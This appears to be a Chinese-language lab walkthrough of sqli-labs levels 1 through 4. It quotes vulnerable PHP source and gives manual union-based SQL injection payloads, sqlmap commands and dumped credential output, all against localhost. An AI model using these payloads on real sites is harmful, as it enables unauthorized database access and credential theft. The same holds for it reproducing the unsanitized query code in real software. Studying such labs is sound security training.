基础注入
less-1
- 源码分析:
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
mysql_query(query, connnection) # 对select show explain descdirbe 返回一个资源标识符,如果执行不正确返回false,对于其他执行成功返回true,否则返回false。执行sql查询语句,执行sql语句(该函数自动记录进行读取和缓存,如果运行 非缓存查询,mysql_unbuffered_query())
mysql_fetch_array(data, array_type) # 函数从结果集中取得一行作为关联数组,data 可选项规定使用的数据指针,指针为mysql_query()函数产生的结果。type可选 默认:mysql_both 同时产生关联和数字数组,mysql_assoc 关联数组, mysql_num数字数组。相比[^mysql_fetch_row()]除了数据以数字索引方式存储在数组中,还将数据作为关联索引存储,用字段作为键名。。
-
注入点
插入 ' or 1=1 -- +
由查询语句得知填入1' or 1=1 -- +得到重新闭合后的语句为:
select xxx from where id='1' or 1=1 -- + LIMIT 0,1 --> select xxx from where id='1' or 1=1 通过这个直接操纵了sql语句的执行or 1=1 恒为真
对比正常的语句:$sql="SELECT * FROM users WHERE id='1' LIMIT 0,1";
因为没有对输入做出任何 的过滤导致可以直接插入符号控制sql语句的执行
-
判断列
插入' order by 4 -- +
select xx from where id='1' order by 4 -- +
返回正常则存在列数,返回错误则不存在(二分法判断列数)
-
union 语句的使用
插入 -1' union select 1,2,database() -- +
id=-1 两个sql语句联合操作时,当前一个语句选择内容为空,这里就将后面的语句内容显示出来
判断出列了,可以使用union语句来将sql语句进行联合
注意: union语句前后的选择列数要相同,union all 和union 的区别是增加了去重的功能
查表:
http://127.0.0.1/Less-1/index.php?id=1.1' union select 1, group_concat(table_name), 3 from information_schema.tables where table_schema='security' -- +
结果:
Welcome Dhakkan Your Login name:emails,referers,uagents,users Your Password:3查字段:
-1' union select 1, group_concat(column_name), 3 from information_schema.columns where table_name='users' -- +
结果:
Welcome Dhakkan Your Login name:id,username,password Your Password:3查数据:
-1' union select 1,username,password from users where id=2 -- +
结果:
Welcome Dhakkan Your Login name:Dummy Your Password:p@sswordslqmap:
python sqlmap.py -u url?id=1 # 查看是否有注入点 python sqlmap.py -u url?id=1 --dbs # 查看数据库 python sqlmap.py -u http://127.0.0.1/Less-1/index.php?id=1 -D security --tables # 查看数据表 python sqlmap.py -u http://127.0.0.1/Less-1/index.php?id=1 -D security -T users --columns # 查看数据库字段名 python sqlmap.py -u http://127.0.0.1/Less-1/index.php?id=1 -D security -T users -C username,password --dump # 查看指定字段的数据Database: security Table: users [13 entries] +----------+------------+ | username | password | +----------+------------+ | admin | admin | | admin1 | admin1 | | admin2 | admin2 | | admin3 | admin3 | | admin4 | admin4 | | secure | crappy | | Dumb | Dumb | | dhakkan | dumbo | | superman | genious | | Angelina | I-kill-you | | batman | mob!le | | Dummy | p@ssword | | stupid | stupidity | +----------+------------+
Less-2
- 源码如下:
// connectivity
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; // 直接带入查询不需要引号闭合
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
-
手工判断注入点
输入' 和''发现报错,报错信息如下
Welcome Dhakkan You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' LIMIT 0,1' at line 1带入之后执行的语句如下:
select * from TABLE where id=1';
奇数个单引号带入查询,发现错误,得到结论直接是整数带入查询,没有特殊符号,不需要闭合。(直接使用查询语句就好)
select * from TABLE where id = (some integer value)
直接使用查询语句,注释掉后面的部分,查询语句如下:
http://127.0.0.1/Less-2/index.php?id=1.1 union select 1,database(),version() --+ //查数据库名和版本号 http://127.0.0.1/Less-2/index.php?id=1.1 union select 1,group_concat(schema_name),3 from information_schema.schemata --+ // 查询所有数据库的名称 http://127.0.0.1/Less-2/index.php?id=1.1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' -- + // 查询指定数据库的表名 http://127.0.0.1/Less-2/index.php?id=1.1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' -- + //查询指定表的字段名 http://127.0.0.1/Less-2/index.php?id=1.1 union select 1,group_concat(id, username, password), 3 from users -- + // 查询字段数据 也可以加上where id=1 来查询指定的数据结果:
Welcome Dhakkan Your Login name:security Your Password:5.5.44-0ubuntu0.14.04.1 Welcome Dhakkan Your Login name:information_schema,challenges,mysql,performance_schema,security Your Password:3 Welcome Dhakkan Your Login name:emails,referers,uagents,users Your Password:3 Welcome Dhakkan Your Login name:id,username,password Your Password:3 Welcome Dhakkan Your Login name:1DumbDumb,2AngelinaI-kill-you,3Dummyp@ssword,4securecrappy,5stupidstupidity,6supermangenious,7batmanmob!le,8adminadmin,9admin1admin1,10admin2admin2,11admin3admin3,12dhakkandumbo,14admin4admin4 Your Password:3 Welcome Dhakkan Your Login name:4securecrappy Your Password:3 -
sqlmap跑如下:
sqlmap -u http://127.0.0.1/Less-2/index.php?id=1 --dbs -D security --tables -D security -T users --columns # 如果已知数据表数据较少可以直接--dump -D security -T users -C id,username,password --dump 或者-D security -T users --dump
Less-3
- sql操作源码如下:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1"; // 这里使用')来闭合
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
-
手工判断
输入')报错如下
Welcome Dhakkan You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') LIMIT 0,1' at line 1
注释闭合后正常执行
http://127.0.0.1/Less-2/index.php?id=1.1’)union select 1,database(),version() --+ //查数据库名和版本号 步骤如less-2 注意闭合部分为') Welcome Dhakkan Your Login name:security Your Password:5.5.44-0ubuntu0.14.04.1 sqlmap 操作如上一样
Less-4
-
sql操作语句如下:
$id = '"' . $id . '"'; //对$id前后加上了“”来修饰,所以闭合id 需要“ $sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1"; // 对id加上了()来修饰,加上id自带的”“所以闭合符号为"),其他都是一样的。 $result=mysql_query($sql); $row = mysql_fetch_array($result);其他查询语句和上面的都是一样的
